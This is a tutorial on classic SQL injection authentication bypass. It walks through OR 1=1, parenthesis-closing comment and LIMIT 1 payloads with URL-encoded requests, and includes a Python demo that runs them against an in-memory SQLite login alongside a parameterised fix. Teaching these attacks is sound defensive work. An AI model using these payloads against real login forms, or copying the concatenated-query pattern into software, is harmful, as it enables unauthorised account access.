Standard SQL Injection | Injection attacks – OWASP #1 Vulnerability

In our previous article we learned the basics of Blind SQL Injection, where the application parses untrusted data straight into a query. Today we will look in detail at Standard SQL Injection (also called Classical SQL Injection). Let's first revisit what we learned in that article about the always-true condition (OR 1=1).
Consider a login form whose server-side code builds the query by concatenating the two form fields directly into the SQL string:

SELECT * FROM Users WHERE Username='$username' AND Password='$password'

If the attacker submits the following value in both fields:

$username = 1' or '1' = '1
$password = 1' or '1' = '1

the single quote in the payload closes the string literal the developer opened, and the rest of the payload becomes part of the SQL. The query the database actually receives is:

SELECT * FROM Users WHERE Username='1' OR '1' = '1' AND Password='1' OR '1' = '1'

Because AND binds tighter than OR, the WHERE clause is evaluated as Username='1' OR ('1' = '1' AND Password='1') OR '1' = '1'. The last disjunct is always true, so every row of Users matches, the query returns the whole table, and the application logs the attacker in (typically as whichever user comes back first). Sent over HTTP with the spaces URL-encoded, the request looks like this:

http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1&password=1'%20or%20'1'%20=%20'1
A slightly hardened version of the same login query hashes the password and wraps each condition in parentheses:

SELECT * FROM Users WHERE ((Username='$username') AND (Password=MD5('$password')))

The previous payload no longer works here: the injected OR only widens the Username condition, and the Password=MD5(...) condition still has to be satisfied. Instead the attacker closes the open parentheses himself and comments out everything the application appends after his input:

$username = 1' or '1' = '1'))/*
$password = foo

SELECT * FROM Users WHERE ((Username='1' or '1' = '1'))/*') AND (Password=MD5('foo')))

Everything after /* is treated as a comment, so the password check is never evaluated and the query again matches every row. Note that this relies on the DBMS accepting a comment that is never closed, which depends on the database and version; where it is not accepted, a line comment such as -- (with a trailing space) or, on MySQL, # (URL-encoded as %23) does the same job. The request:

http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1'))/*&password=foo
Some applications reject the login when the query returns more than one record. On MySQL (and other databases that support LIMIT) the attacker gets around this by appending LIMIT 1 before the comment, so that exactly one row comes back:

$username = 1' or '1' = '1')) LIMIT 1/*
$password = foo

SELECT * FROM Users WHERE ((Username='1' or '1' = '1')) LIMIT 1/*') AND (Password=MD5('foo')))

The request, with the space before and after LIMIT encoded as %20:

http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1'))%20LIMIT%201/*&password=foo
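As an added, runnable illustration (not code from the original article), the following Python script replays the three payloads above against an in-memory SQLite database. The Users table, its three accounts and the MD5() function registered with SQLite are constructed here for the demonstration; the two query strings are the article's own shapes, built by string concatenation exactly as a vulnerable application would. It shows that the plain OR payload works against the simple query but fails against the parenthesised MD5 query, that the closing-parentheses payload returns every row (and is rejected by a login routine that insists on exactly one row), that LIMIT 1 gets past that routine, and that a parameterised query is unaffected by any of the payloads.

```python
import hashlib
import sqlite3

# Constructed sample data (not from the article): three accounts standing in
# for the application's Users table. Passwords are stored as MD5 hex digests,
# matching the MD5('$password') in the article's second query.
USERS = [("admin", "s3cret-admin"), ("alice", "wonderland"), ("bob", "builder")]


def md5_hex(value):
    # SQLite has no MD5(); this function is registered under that name so the
    # article's query runs unchanged. str() because an injected expression
    # such as '1' or '1' = '1' evaluates to an integer, not a string.
    return hashlib.md5(str(value).encode()).hexdigest()


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.create_function("MD5", 1, md5_hex)
    conn.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)",
                     [(u, md5_hex(p)) for u, p in USERS])
    return conn


def query_simple(username, password):
    # First query shape from the article: no parentheses, plaintext compare.
    return ("SELECT * FROM Users WHERE Username='" + username
            + "' AND Password='" + password + "'")


def query_parens_md5(username, password):
    # Second query shape from the article: nested parentheses and MD5().
    return ("SELECT * FROM Users WHERE ((Username='" + username
            + "') AND (Password=MD5('" + password + "')))")


def run_vulnerable(conn, build_query, username, password):
    """Concatenates the attacker's input into SQL and returns the matching
    rows. A naive application treats any non-empty result as a login."""
    return conn.execute(build_query(username, password)).fetchall()


def run_fixed(conn, username, password):
    """Same predicate as query_parens_md5 but with bound parameters: the
    payload is compared as a string value and never reaches the SQL parser."""
    sql = "SELECT * FROM Users WHERE ((Username=?) AND (Password=MD5(?)))"
    return conn.execute(sql, (username, password)).fetchall()


def strict_login(rows):
    """Login check that insists on exactly one matching row; this is the
    behaviour that forces the attacker to append LIMIT 1 (third payload)."""
    return rows[0][0] if len(rows) == 1 else None


PAYLOAD_OR = "1' or '1' = '1"                  # article's first payload
PAYLOAD_CLOSE = "1' or '1' = '1'))/*"          # closes the parentheses, comments out the rest
PAYLOAD_LIMIT = "1' or '1' = '1')) LIMIT 1/*"  # same, but returns a single row


def demo():
    conn = make_db()
    results = {}
    # Shape 1: OR-true in both fields matches every row.
    results["simple_or"] = len(run_vulnerable(conn, query_simple, PAYLOAD_OR, PAYLOAD_OR))
    # Shape 2: the same payload fails because the MD5 password clause is still live.
    results["parens_or"] = len(run_vulnerable(conn, query_parens_md5, PAYLOAD_OR, PAYLOAD_OR))
    # Shape 2: closing the parentheses and commenting out the rest matches every row,
    # which a strict one-row login check rejects.
    rows_close = run_vulnerable(conn, query_parens_md5, PAYLOAD_CLOSE, "foo")
    results["parens_close"] = len(rows_close)
    results["strict_close"] = strict_login(rows_close)
    # Shape 2 with LIMIT 1: a single row (the first user) satisfies the strict check.
    rows_limit = run_vulnerable(conn, query_parens_md5, PAYLOAD_LIMIT, "foo")
    results["strict_limit"] = strict_login(rows_limit)
    # Parameterised query: the payload is just an unknown username; real logins still work.
    results["fixed_close"] = len(run_fixed(conn, PAYLOAD_CLOSE, "foo"))
    results["fixed_legit"] = len(run_fixed(conn, "alice", "wonderland"))
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

SQLite, like MySQL, treats an unterminated /* as a comment that runs to the end of the statement, which is what lets the injected comment swallow the ') AND (Password=MD5('foo'))) tail the application appends; on a DBMS that rejects an unclosed comment, swap /* for a line comment as discussed above.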